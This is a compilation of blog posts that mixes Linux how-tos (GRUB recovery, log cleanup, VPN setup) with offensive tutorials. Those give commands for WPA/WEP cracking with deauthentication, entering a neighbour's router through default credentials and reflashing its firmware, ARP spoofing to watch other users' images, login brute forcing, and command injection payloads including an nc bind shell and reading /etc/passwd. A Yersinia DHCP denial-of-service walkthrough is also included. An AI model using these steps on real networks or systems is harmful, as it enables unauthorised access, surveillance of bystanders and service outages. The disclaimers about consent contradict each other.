'apt-add-repository' command not found Debian / Ubuntu [Solution]

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

You might have encountered certain non-standard packages that have no installation candidates in your current repositories. In such cases, you can try to add a new repository. However, you might have encountered an error that says: 'apt-add repository' command not found. The system currently has no path to the binary 'apt-add-repository' which is why it says it cannot find that command.

Here's the fix

Execute the following commands in your terminal:

$wget http://blog.anantshri.info/content/uploads/2010/09/add-apt-repository.sh.txt

(thanks to the author this script!)

$mv add-apt-repository.sh.txt /usr/sbin/add-apt-repository

$chmod o+x /usr/sbin/add-apt-repository

$chown root:root /usr/sbin/add-apt-repository

If you are not using a 'root' account, then add a 'sudo' infront of each of these commands before executing them.

Now, trying adding the new repository again. For example:

$add-apt-repository ppa:webupd8team/sublime-text-2

$apt-get update

(the repository you are trying to add might be different in your case)


You should now be able to add new repositories to your system and install non-standard packages.

Please let me know in the comments below if you come across any issues.

/var/log Disk Space Issues | Ubuntu, Kali, Debian Linux | /var/log Fills Up Fast

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

Recently, I started noticing that my computer keeps running out of space for no reason at all. I mean I didn't download any large files and my root drive should not be having any space issues, and yet my computer kept tellling me that I had '0' bytes available or free on my /root/ drive. As I found it hard to believe, I invoked the 'df' command (for disk space usage):

#df

So clearly, 100% of the disk partition is in use, and '0' is available to me. Again, I tried to see if the system simply ran out of 'inodes' to assign to new files; this could happen if there are a lot of small files of '0' bytes or so on your machine.

#df -i

Only 11% inodes were in use, so this was clearly not a problem of running out of inodes. This was completely baffling. First thing to do was to locate the cause of the problem. Computers never lie. If the machine tells me that I am running out of space on the root drive then there must be some files that I do not know about, mostly likely these are some 'system' files created during routine operations.

To locate the cause of the problem, I executed the following command to find all files of size greater than ~2GB:

# find / -size +2000M

Clearly, the folder '/var/log' needs my attention. Seems like some kernel log files are humongous in size and have not been 'rotated' (explained later). So, I listed the contents of this directory arranged in order of decreasing size:

#ls -s -S

That one log file 'messages.1' was 12 GB in size and the next two were 5.5 GB. So this is what has been eating up my space. First thing I did, was run 'logrotate':

#/etc/cron.daily/logrotate 

It ran for a while as it rotated the logs. logrotate is meant to automate the task of administrating log files on systems that generate a heavy amount of logs. It is responsible for compressing, rotating, and delivering log files. Read more about it here.

What I hoped by running logrotate was that it would rotate and compress the old log files so I can quickly remove those from my system. Why didn't I just delete that '/var/log' directory directly? Because that would break things. '/var/log' is needed by the system and the system expects to see it. Deleting it is a bad idea. So, I needed to ensure that I don't delete anything of significance.

After a while, logrotate completed execution and I was able to see some '.gz' compresses files in this directory. I quickly removed (or deleted) these.

Still, there were two files of around 5 GB: messages.1 and kern.log.1.  Since these had already been rotated, I figured it would be safe to remove these as well. But instead of doing an 'rm' to remove them, I decided to just empty them (in case they were being used somewhere).

#> messages.1
#> kern.log.1

The size of both of these was reduced to '0' bytes. Great! Freed up a lot of disk space this way and nothing 'broken' in the process.

How did the log files become so large over such a small time period?

This is killing me. Normally, log files should not reach this kind of sizes if logrotate is doing its job properly or if everything is running right. I am still interested in knowing how did the log files got so huge in the first place. It is probably some service, application or process creating a lot of errors maybe? Maybe logrotate is not able to execute under 'cron' jobs? I don't know. Before 'emptying' these log files I did take a look inside them to find repetitive patterns. But then I quickly gave up on reading 5 GB files as I was short on time.

Since this is my personal laptop that I shut down at night, as opposed to a server that is up all the time, I have installed 'anacron' and will set 'logrotate' to run under 'anacron' instead of cron. I did this since I have my suspicions that cron is not executing logrotate daily. We will see what the results are.

I will update this post when I have discovered the root cause of this problem.

Multiple Screens in (Kali) Linux | How To

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

I have felt the need for multiple screens several times simply because of the many tabs and terminal windows I keep open on my box. Hence, to avoid constantly switching between these, I decided to bring in multiple screens . You might have felt the same--especially if you work on multiple applications simultaneously. Some people use these multiple screens while playing games as well.

Before I brought in new screens, I wanted to get a 'feel' of using them, and decide whether this is something I would be comfortable with while working. Fortunately, I had an old LG 17'' CRT monitor lying around which I used for testing this set up of multiple screens. Here, the operating system I am using is Kali Linux (Debian 7 wheezy) but the process is fairly straightforward and would work for any Linux (or Windows) box.

How to set up multiple screen on (Kali) Linux

Firstly, you need to make the hardware connection, that is, connect the other screen's display cable to your machine. In my case, I connected the old CRT monitor's VGA cable to my HP laptop.

You need to locate the 'Display' panel to set up the initial configuration. This should not be hard to do. On a Debian or Kali Linux box, this would be under 'Applications' --> 'System Tools' --> 'Preferences' --> 'System Settings' --> 'Displays'

The location of 'Displays' could vary according to your Linux distro, however, again, it should not be hard to locate. Once inside, you will see that your OS has detected the two displays. Uncheck 'Mirror displays'. By default, your laptop's screen is the primary display and would be on the left. You can drag and change this so that the laptop's display is on the right--as I have done here.

How to set the primary display screen

By default, your laptop's screen is your primary display. This means that the top panel, containing 'Applications' and 'Places', and the bottom panel, tracking open windows and tabs, would be available on the laptop's screen only. I wanted to change this so that my CRT monitor's screen was the primary screen. To do so, I edited the monitors.xml file in Linux.

Locate 'monitors.xml' in '/home/.config/monitors.xml' or '/root/.config/monitors.xml'. Now, edit it in a text editor so that you modify the line containing '<primary>yes/no</primary>'.

In my case, I have modified the xml file so that the part corresponding to my laptop's screen says  '<primary>no</primary>', and the part corresponding to the CRT monitor says '<primary>yes</primary>'.

Now, the CRT monitor is the primary screen and the 'Applications', 'Places' etc would show up here. After all the set up, this is what it looks like on my box:

Note that this is the extended display corresponding to both the screens, that is, half of this shows up on one screen and half on the other. This is a picture of my set up:

Note: The Guake terminal (yellow font) has been configured to show up on both the screens. For this, I edited the '/usr/bin/guake' and changed the width from '100' to '200'.

So far, I am pleased with this multiple screen set up as it offers me a lot more work space, but it will take a little getting used to.

How to Use Truecrypt | Truecrypt Tutorial [Screenshots] | Kali Linux, BackTrack, BackBox, Windows

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

Data protection is crucial. The importance of privacy--specially concerning sensitive documents--cannot be overstated, and if you’re here, you have already taken the first step towards securing it.

Truecrypt is one of the best encryption tools out there. It’s free and available for Windows and Linux. It comes pre-installed in Kali Linux and Backtrack. I first came across the tool when I was reading ‘Kingpin’ (The infamous hacker Max Butler was using it to encrypt data that could be used as evidence against him).

Here is how you can set up Truecrypt for use in Kali Linux (similar procedures will work in other Linux distros and Windows).

Goto Applications -> Accessories -> Truecrypt

Truecrypt main window opens up. As this is the first time we are using Truecrypt we need to set up a volume for our use.

Click ‘Create Volume’ and the Truecrypt volume creation wizard opens up:

Click on ‘create an encrypted file container’

This container will contain your encrypted files. The files can be of any type, as long as they lie in this container, they will be encrypted after ‘dismounting the volume’.

Now the next screen asks if you want to create a Standard or Hidden Volume. In case of hidden volume, no one would really know that it is there so they can’t ‘force’ you to provide its password.

For now we will just create a ‘Standard’ volume.

On the next screen you will asked for the ‘location’ of this volume. This can be any drive on your computer. This is where your container will lie. The container can be seen at this location but it won’t have any ‘extension’ and will have the name that you provide it during this set up.

Choose any ‘location’ on your computer for the container and carry on to the next step.

A password is now required for this volume. This is the ‘password’ which will be used to decrypt the volume while ‘mounting’ it. Needless to say, it should be strong as a weak password defeats the whole purpose of security/encryption.

Next click on ‘Format’ and the volume creation would begin. You will be shown a progress bar and it will take some time depending on how big your volume size is.

Once your ‘Formatting’ is completed. Your volume is ready to be used. You can place files in there (drag and drop works). Once done ‘Dismount’ this volume and exit Truecrypt.

When you want to access the encrypted files in the container, fire up Truecrypt and click on any ‘Slots’ on the main window.

Now goto ‘Mount’ and point to the location of the container which you selected during setting up the volume.

It will then prompt you for the password.

If you provide the correct password, you’ll see that the volume is mounted on the ‘Slot’ that you selected, if you double-click that ‘Slot’ a new explorer window would open where you can see your decrypted files and work with them. And you can add more files to the container if you want.

After you’re done, ‘Dismount’ the volume and exit Truecrypt.

How To Recover Grub After Installing Windows | Ubuntu / Kali / Debian Linux

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

A Little Rant

It's 2014 and Windows still assumes that it's the only OS out there.

When you install windows and then install Linux, in the grub boot menu you would find Windows properly accounted for. Grub recognized windows and creates an entry for it in the Boot Menu.

Should we assume Microsoft likes bullying (since there's no apparent technical reason for why they won't make a windows boot-loader that would recognize and make an entry for Linux in the Boot menu).

So if you have Linux and then you try to install Windows, it's nasty boot-manager would remove the linux entry and all you will see at Boot time is Windows and no entry for linux.

Kali Linux is the primary OS that I use on my laptop. I rarely ever use windows so I removed it altogether. However I was developing an App for Windows and needed to code in Windows SDK (Visual Studio) since I needed some libraries like 'wlanapi' that weren't present in Linux IDEs

Long story short, I installed Windows on top of Kali and as I expected, it removed the entry to Kali from the boot menu.

Here are a few commands that I used to solve this issue. This is by far the easiest way to bring the Linux / Ubuntu / Kali boot entry back.

How To Recover Grub (Kali Linux Boot Menu Entry) After Installing Windows 

For this you need:

1. Ubuntu (or Any linux) Live CD / USB

2. Eyes to read and Fingers to Type some commands 

Step 1. Boot from the Ubuntu / Kali / Fedora (any linux) live disk OR USB

Step 2. After the 'Live CD Desktop' loads up, Find Terminal.

Step 3. After the Terminal comes up. Type the following commands:

#sudo mount /dev/sda10 /mnt 

#Note that here for me the root ( / ) of my Kali Linux was on device '/dev/sda10'. For you this would be different and you should check this out under 'Disk Manager' in your Live CD. You are looking for the partition number of your main partition

#for i in /sys /proc /run /dev; do sudo mount --bind "$i" "/mnt$i"; done

#sudo chroot /mnt

#update-grub

#grub-install /dev/sda

#update-grub

Step 5. That's it. Exit the Terminal and reboot.

You should now see Grub restored. This is one of the ways in which you can easily and quickly restore grub after installing windows

Note that sometimes you may loose the entry to your Windows OS after these steps. But all you need to do is run these 3 commands to get it back:

#apt-get install os-prober

#os-prober

#update-grub

 

Update

 

I recently lost Linux grub again after installing Windows 7 on my laptop and this time I decided to try an ISO called 'boot-repair disk'. I had heard of this a lot and seems to be the tool of choice for people who don't want to get their hands dirty using the linux terminal.

The tool is pretty good in that it does what it is meant for, without any glitches. This is all you have to do:

1. Download 'boot-repair disk' ISO

2. Burn it to a CD or make a bootable Pendrive

3. Boot into the boot-repair disk ISO

After that, it is all automated. As soon as you boot into this live disk, it will automatically begin mounting all your file systems and looking for grub. Once it is located, it will be restored automatically and at the end a message will be displayed to you.

So if you are someone who isn't all that thrilled about typing commands on a Linux terminal in the method I discussed previously, this ISO is for you.

References:

AskUbuntu.com

WPA / WPA2 Handshake Cracking WITH Dictionary using Aircrack-ng | How To | Wireless Hacking

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

If you are planning to hack your nearest WPA/WPA2 network (with No WPS), I have two words for you: Good. Luck.

In all my experiments with penetration testing, I have found dictionary attacks on WPA/WPA2 handshakes to be the most annoying and futile exercises. This is because:

• going through each word in a dictionary file containing millions of words is time-consuming.
• success is not guaranteed (the passphrase may not be present in your dictionary).

During my experiments in India, the WiFi passphrases are usually a combination of Hindi and English words or a Hindu name which are, of course, not present in any dictionary that I download no matter how exhaustive it promises to be.

If you are still brave enough to try a dictionary attack on WPA handshake, here's the procedure.

UPDATE: I have also posted a video on how capture and crack a WPA hanshake on my YouTube channel.

How to launch a Dictionary Attack on WPA Handshake

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface

#airmon-ng start wlan0

This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.

#airodump-ng mon0

Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.

#airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:

#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0

If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:

#aireplay-ng --deauth 0 -a <AP_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:

#aircrack-ng capture_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst

Now say your prayers and hope the passphrase is present in the dictionary you chose.

You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Hacking Neighbour's Wifi (Password) | Hacking Neighbor's Wireless (Internet) | Step by Step How To

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

Disclaimer: For educational purposes only: This is meant merely to exhibit the dangers of using Poor wireless security. Please note that prior to beginning the test you should seek explicit consent from the owner if the access point does not belong to you.

Hacking into a Neighbor's Wifi access point

OS: Kali Linux
Test Subject: Neighbor's WiFi Access Point
Encryption: WEP

I noticed 4 wireless Access Points in the vicinity. 3 of these were using WPA / WPA2 and I was in no mood for a dictionary attack on WPA handshake, since it takes a long time and success isn't guaranteed. I found one access point using WEP Security and as you know it is an outdated protocol with poor security.

I tested penetrating this WEP access point using the same Aircrack-ng Suite of tools as I have mentioned in this previous post.

Step 1: Discovered the WEP AP having SSID 'dlink'  (Notice the weak signal power from neighbor's house to mine)

Step 2: Collected the required number of Data Packets from the WEP Network. Meanwhile, I used 'aireplay-ng --arpreplay' to increase the data rate since I am not a Patient soul.

Step 3: Saved the data packets in a file called 'neighbor-01.cap' and cracked the password using 'Aircrack-ng'

The Key for the Neighbor's Wifi turned out to be: "1234567890"   -    (An easily guessable Password, just what I expected from someone using WEP Security in 2014)

Step 4: I connected to the wifi using the decrypted key, it allocated an IP to me using DHCP (192.168.0.102)

Note: If you want a better step by step on how to hack a WiFi, check out my previous post here.

5: I was connected to the Internet.

6: Since I was part of their network now, curiosity got the better of me and I decided to scan the network and see who else is connected. I found 3 devices in the network:

One was my Laptop
Another one was my cellphone (I connected my cellphone to the network earlier)
And third was the Dlink router itself (192.168.0.1)

None of the neighbor's own devices were connected to the network at the time.

nmap told me that the dlink router had an open port 80, which reminded me to check out the control panel of this dlink device.

Step 7: So I fired up my browser and went to '192.168.0.1:80' which opened the login panel for dlink access point control panel



Step 8:  Quick google search revealed that defaults for login on dlink devices are:

username: 'admin' and password:blank

Step 9: A tried logging in with defaults and got access to the control panel.




(Again BAD security practice: leaving defaults unchanged!)

Step 10: I was getting weak power from the AP and decided to upgrade their firmware and see if it made a difference.

The Current firmware of the neighbor's wifi was '5.10'

I checked for latest Firmware available. It was '5.13'



I downloaded the upgrade on my machine ("DIR********.bin")

Step 11: I made a backup of the configuration of the Access point before upgrading. I saved backup 'config.bin' to my laptop from the neighbor's wifi

Step 12: I went ahead and upgraded the Firmware. I uploaded the DIR****.bin from my laptop to the access point and it went for a reboot.



I lost access to the WiFi after the upgrade.

I figured the new upgraded firmware changed the Password for the WiFi now and I couldn't connect to it anymore. Moreover, since I lost access to the Internet now along with the WiFi, I couldn't Google the default password for the upgraded firmware anymore.

And I couldn't crack it either because this time no one--not even the neighbor himself--would be able to authenticate to the WiFi with the new unknown password after the firmware upgrade and hence no data packets would be generated and I will have nothing to crack.

Step: I fired up 'Airodump-ng' again and noticed that the firmware upgrade simply changed the access point security to "open", ie, no password is required to connect to it.

Step: I connected to the "Open" wifi and restored the Configuration settings using the 'config.bin' backup I made earlier.

I manually selected WPA2 security and provided the same password as used earlier by my neighbor ("1234567890")

Disclaimer: Please note that I had explicit consent from the owner before commencing this test. If you do not have such permission, please try it on your own access point. Failing to do so will result in illicit activities.

Driftnet Tutorial | How to Sniff Images with Driftnet + Arpspoof / Ettercap | Kali Linux / Backtrack

Written by Pranshu Bajpai | Join me on Google+ | LinkedIn

If you're on a shared LAN and you are curious to know what kind of images people are searching for over the web on your Local LAN, you can use Driftnet.

For a penetration tester, there's no direct point of doing this, but since I tested this, I thought I might as well make a post about it. As a network administrator who is enforcing a policy on what kind of images are being searched on the local network, this might come in handy to see what images people are viewing at any time.

How to Sniff Images using Driftnet | ARP Spoofing with Arpspoof or Ettercap in Kali Linux

If you are learning, it is better to use Arpspoof to do the spoofing since it's a manual command line tool and if you set up the man in the middle attack in this manner, it will aid your learning.

1. Enable IP forwarding

#echo 1 >> /proc/sys/net/ipv4/ip_forward

2. Use Arpspoof on the desired interface [eth0] to spoof local switch's MAC to your own for a particular Victim IP in the network [see Figure below]



Victim machines now think you are the switch, hence all packets destined for the switch arrive on your machine.

3. Use Arpspoof to spoof the victim's MAC to your own for the switch on the network.



Traffic from switch destined to the victim's IP now arrives on your machine.

You are now acting as the "man in the middle"

4. Fire up driftnet. If you've done it all right, you should see the images

Looks like someone's hunting for a new dress.

Using Ettercap to perform the ARP Spoof

This is a GUI tool, and ARP Spoofing using Ettercap is simply point and click a few times. There are several tutorials on it on the web, so I am not covering that. But the concept is the same Man in the Middle Attack.

Web Applications Authentication Brute Force | Practical Demo [Screenshots] | Brute Force Website Login | How To

Written by Pranshu Bajpai | Google+ Pranshu Bajpai | LinkedIn

This post is meant to elucidate  web application brute forcing by providing a practical demo.

Read up on Authentication Brute Force here.

OWASP testing guide is your friend in Web Application Hacking.

How To Brute Force Website Login | Web Application Hacking Example | Authentication Brute Force

We have a 'Test' website running on 172.19.17.120. I have created a Test account on it with username 'pranshu' and password 'p'. (As we are playing the part of a penetration tester, during the test we will assume we do not know the password)

It has a login form requiring a 'username' and 'password'. HTTP POST Request Parameters are used.

Set up Burpsuite Proxy to intercept traffic between your browser and the server page you will be trying to brute force [Read up on Burpsuite]

Then send these to Burpsuite 'Intruder' to be attacked

The attack we will use is 'Cluster Bomb'

The highlighted parameters in the image above are the ones which will be bruteforced.

In case you already know 'username', "un-highlight" it, meaning Brute Force Password only. Since I already know the username is 'pranshu', I will try to brute force the password and set username as 'pranshu'

Payload type is a 'simple list' of characters 'a,b,c,d....z'  [which we will use as possible passwords]

Execute the attack. It will set the username to 'pranshu' and go through the 'simple list', trying every possible alphabet as password. All will recieve HTTP code 200 (OK)

Except one where the payload was set to 'p'. It received HTTP code 302 (Redirect)

If you know HTTP codes you know that 302 (Redirect) means that the webpage is trying to send us to another page. As a penetration tester, I would guess that the re-direction is occurring because of successful login (redirect to 'Home' page or something)

To verfiy this, I 'render' the 'response' in Burp suite and sure enough I see I am logged in as user 'pranshu'.

In this case, I have used BurpSuite but you can use 'Brutus' or 'Hydra' for such online brute force password cracking.

Command Injection Attack Example [Screenshots] | Web Applications Hacking | Using Kali Linux

Written by Pranshu Bajpai | Google+ Pranshu Bajpai | LinkedIn

Read up on command injection here.

OWASP testing guide is your best friend while learning web applications hacking or penetration testing.

I tested the attack on two different vulnerable applications, one of which is 'Mutillidae'

Command Injection Attack Example

Ideally, you are supposed to 'lookup' DNS and resolve hostnames to IP addresses using this web application.

However, the code is vulnerable to 'command injection attack'.

As you know, in Bash we can execute two commands one after the other by typing:

#cmd1 && cmd2

Try this in the vulnerable application (the point is to get another command executed on the server)

www.facebook.com && ls /

In the vulnerable application first Facebook's IP address would be resolved on the server and then the second command would get executed, listing the contents of the 'root' directory.

Now that you know the command injection vulnerability exists, you can try different commands and construct an attack

For example:

Display the contents of 'passwd' file

www.facebook.com && cat /etc/passwd

OR invoke netcat to listen for commands on port 8085 of the victim machine:

www.facebook.com && nc -l -p 8085 -e '/bin/bash'

See what we did here?

I assume netcat utility would be present on the server, so I tell it to listen on port 8085 (and invoke bash)

Now from our Terminal we can use our netcat client to connect to that server

#nc 172.X.X.X 8085

We are connected. We can now begin executing commands on the compromised remote machine.

#whoami

Note that we are a normal user--'www-data'--and not root. Hence, we have limited Privileges at this point.

However, using privileges of 'www-data' it is possible for us to deface the website. Note that defacing a website is unacceptable even as part of a penetration test, so do not go through with it.

To deface the website

#vi /var/www/index.html

It is now possible to edit this file to make changes to deface to the website.

Note that you can terminate the first command simply by typing ';' and, hence, don't always need the first part, that is, 'www.facebook.com'. For example:

; cat /etc/passwd

VPN Configuration / VPN Client in Kali Linux / Debian / Ubuntu / Backtrack | How to | Anonymous Internet | VPN Secure Connection

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

As a penetration tester, I have a variety of concerns while using the Internet:

1. Security: While I work as a penetration tester for remote clients, I like to make sure my "tunnel" to the internet is free from eavesdroppers and is reasonably secure. VPN tunneling takes care of that.

2. Anonymity: All of us need  privacy and anonymity for one reason or another. VPN servers allow that by 'not storing' logs of usage on their servers.

3. Over-blocking and "Internet-usage Policies": ISPs and local network administrators can get overzealous about restricting user activity on their networks (this is specially so for college and office networks). The network that I use takes pride in blocking categories like "file transfer" and "hacking". On several occasions, I have a legitimate need for visiting a hack forum or a "file transfer" service since most email providers don't allow 'attachments' to go over 25 - 30 MB.

(By the way, you can also use TOR for anonymity and unblocking websites. I have written about how to use TOR in Kali Linux here)

How to set up / configure VPN in Linux:

Step 1. Subscribe to a VPN Service. I have subscribed to AirVPN (around $9 a month)

Step 2. Login to the VPN service provider's website (AirVPN in my case) and locate 'Generate Configuration file'




Step 3. Download the .opvn file

Additionally, a .proxyauth file will be provided if a proxy authentication is required in your local network proxy (see HTTP code 407)

Step 4. In Terminal type:

             #apt-get install openvpn
             #openvpn --version
             #openvpn --config <file_you_downloaded.opvn>

This should configure that VPN.

            #ifconfig

Notice the presence of a new interface 'tun0', along with its IP address (a private IP address provided by the VPN network).

Now remove any local proxy setting you might be using in your browsers or system and connect to the Internet through the VPN tunnel.

How to Install New Cool / Hacker Fonts in Kali Linux / BackTrack / Debian

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

Are you looking to install new cool "HaX0r" fonts on your Linux distro?

My Advice: Don't

Reason: Most of the "hacker" fonts out there are illegible and not suitable for the long hours that you might be spending typing on Terminals as a penetration tester.

Here's how to install a new font in Linux:

Step 1: Download a .ttf font from the Internet. Google it, you will find many. As I have stressed before, avoid "cool hacker" fonts. Look for something comfortable to read.

Step 2.

        #gnome-font-viewer <font_location_on_drive>

(Notice the illegibility of the font)

Step 3. Install font

That's it. The new font will now show up in your 'Set Font' option in Terminal 'Preferences' or wherever you need to use it.

Given below are a couple of images of fonts that were too "Kewl" or "Elite" for me to use. I uninstalled them immediately.

DHCP DOS Attack with Yersinia in Kali Linux / BackTrack | How To

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

So there I was one fine evening, connecting to the internet, sending DHCP request packets to the local DHCP server for address allocation, when I noticed I wasn't getting any IP allocated to me. Some problem with the DHCP.


I 'pinged' the DHCP server thinking that it might be down for some reason. But it did send me a reply, so it was up. Then why wasn't it allocating an address to my computer?

Someone over the LAN had recently discovered Yersinia and proceeded to carry out a denial of service attack on our local DHCP. Not cool.

I decided to write up on Yersinia, since it makes DOS attack on DHCP quite simple and easy with its GUI.

If you're using Kali Linux, type:

            #yersinia -G

This will bring up the GUI which looks like this:

A super-quick discussion on DHCP, this is what happens on the network:

1. I got No IP - You power up your machine. It doesn't have an IP.
2. DHCP DISCOVER: Where can I get an IP? - If configuration isn't set to static, your machine looks for active DHCP servers in vicinity to get Configuration Info.
3. DHCP OFFER: I can give you an IP - The packets from your machines get to the local DHCP server and it sends DHCP offer to your machine.
4. DHCP REQUEST: Great!! Tell me my IP - Your machine responds by requesting configuration.
5. IP Allocation - DHCP Server selects an IP address from its 'pool' of free IPs and allocates it to your machine's MAC address.

So the concept is to send many DHCP discover packets to the local DHCP server, using a different spoofed MAC address each time. The DHCP server's free IP pool would quickly exhaust and a genuine request for DHCP would go unsatisfied.

So here's how we send many DHCP discover packets through Yersinia:

In my Case, I noticed within seconds that '163903' packets were sent. This is a DOS attack on the DHCP server.

Finally, you can stop the attack by 'list all attacks' and then cancelling the active attack.

You can find a 'yersinia.log' file created in your 'home' directory after the attack.

Security Against this DHCP DOS Attack by Yersinia:

Use port security at the Switch: On a specific port on the switch only a limited amount of MAC addresses would be allowed. So MAC spoofing wouldn't work after a while.